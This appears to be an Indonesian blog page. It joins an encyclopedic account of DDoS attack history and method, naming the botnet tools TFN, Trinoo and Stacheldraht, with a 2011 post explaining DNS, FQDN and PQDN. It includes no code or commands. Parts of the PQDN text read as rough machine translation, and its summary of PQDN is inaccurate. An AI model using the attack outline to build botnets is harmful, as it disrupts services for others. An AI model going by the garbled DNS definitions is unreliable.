Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang klasik muncul, dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadi suatu kerumitan yang sangat tinggi (bagi para administrator jaringan dan server yang melakukan perbaikan server akibat dari serangan), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1. Menjalankan tool (biasanya berupa program (perangkat lunak) kecil) yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool (software} yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diunduh (bahasa Inggris: download) secara bebas di Internet.

2. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".

Minggu, Februari 20, 2011

Pengertian FQDN dan PQDN serta perbedaannya

ok sekarang kita masuk dalam FQDN dan PQDN

trus apa FQDN dan PQDN itu? yang jelas semua berhubungan dengan DNS (Domain Name Service)
jadi yang pertama kita harus tahu adalah DNS



DNS
Untuk mengidentifikasi suatu entitas, internet menggunakan alamat IP, yang secara unik mengidentifikasi koneksi dari host ke Internet. Namun, orang lebih suka menggunakan nama daripada alamat numerik. Oleh karena itu, kita membutuhkan sebuah sistem yang dapat memetakan nama ke alamat atau alamat untuk nama. Ketika Internet kecil, pemetaan dilakukan menggunakan file host. File tuan rumah hanya memiliki dua kolom: satu untuk nama dan satu untuk alamat. Setiap host dapat menyimpan file host pada disk dan memperbaruinya secara berkala dari file host master. Ketika sebuah program atau pengguna ingin untuk memetakan nama ke alamat, host berkonsultasi dengan file host dan menemukan pemetaan.

Secara default pengertian DNS adalah
sebuah sistem yang menyimpan informasi tentang nama host nama domain dalam bentuk basis data tersebar (distributed database) di dalam jaringan komputer, misalkan: Internet. DNS menyediakan alamat IP untuk setiap nama host dan mendata setiap server transmisi surat (mail exchange server) yang menerima surat elektronik (email) untuk setiap domain.
maupun

DNS menyediakan servis yang cukup penting untuk Internet, bilamana perangkat keras komputer dan jaringan bekerja dengan alamat IP untuk mengerjakan tugas seperti pengalamatan dan penjaluran (routing), manusia pada umumnya lebih memilih untuk menggunakan nama host dan nama domain, contohnya adalah penunjukan sumber universal (URL) dan alamat email. DNS menghubungkan kebutuhan ini. Jadi penjelasan singkatnya ialah DNS adalah sebuah layanan atau service untuk memetakan alamat IP address menjadi huruf

dan sistem penamaan DNS ada 2 yaitu FQDN dan PQDN.
lalu apa itu FQDN dan PQDN?
ayo kita simak

FQDN
Fully Qualifed Domain Name (disingkat menjadi FQDN), dalam sistem penamaan domain Domain Name System (DNS) merujuk kepada nama bertitik yang dapat mengidentifikasikan sebuah host Transmission Control Protocol/Internet Protocol (TCP/IP) di dalam jaringan dan Internet. FQDN juga sering disebut sebagai Absolute Domain Name. FQDN didiskusikan dalam RFC 1035, RFC 1123 dan RFC 2181.

Sebuah FQDN dari sebuah host mengandung nama host miliknya digabungkan dengan nama domain (dan subdomain) di mana host tersebut berada, yang kemudian dipisahkan dengan menggunakan tanda titik (.). FQDN umumnya digunakan di dalam Uniform Resource Locator (URL) yang digunakan untuk mengakses halaman web di dalam jaringan dan Internet dan membuat path absolut terhadap ruang nama (namespace) DNS ke host target di mana halaman web tersebut berada. FQDN berbeda dengan nama domain biasa karena FQDN merupakan nama absolut dari domain, sehingga sufiks domain tidak perlu ditambahkan.

Contoh FQDN: untuk sebuah nama FQDN id.wikipedia.org, dapat diambil pernyataan bahwa id merupakan nama host, dan wikipedia.org merupakan nama domain-nya. Panjang maksimum dari FQDN adalah 255 bita.

PQDN
domain berkualifikasi parsial (PQDN),. A PQDN mulai dari node tapi tidak mencapai akar. Hal ini digunakan ketika nama harus diselesaikan termasuk dalam situs yang sama sebagai klien. Berikut resolver bisa menyediakan bagian yang hilang, yang disebut akhiran, untuk menciptakan sebuah FQDN.

Misalnya, jika pengguna di fhda.edu tersebut. Situs ingin mendapatkan alamat IP dari komputer penantang, ia dapat mendefinisikan nama parsial Challenger

Klien DNS atc.fhda.edu menambahkan akhiran. Sebelum melewati alamat untuk server DNS. Klien DNS biasanya memegang daftar akhiran. Berikut dapat beberapa dari daftar sufiks di De Anza College.



jadi apa beda antar keduanya?

FQDN adalah sistem penamaan di DNS yang berisi seluruh nama host serta domainnya.
PQDN adalah sistem penamaan di DNS yang hanya berisi domain saja.


terima kasih telah membaca
smoga bermanfaat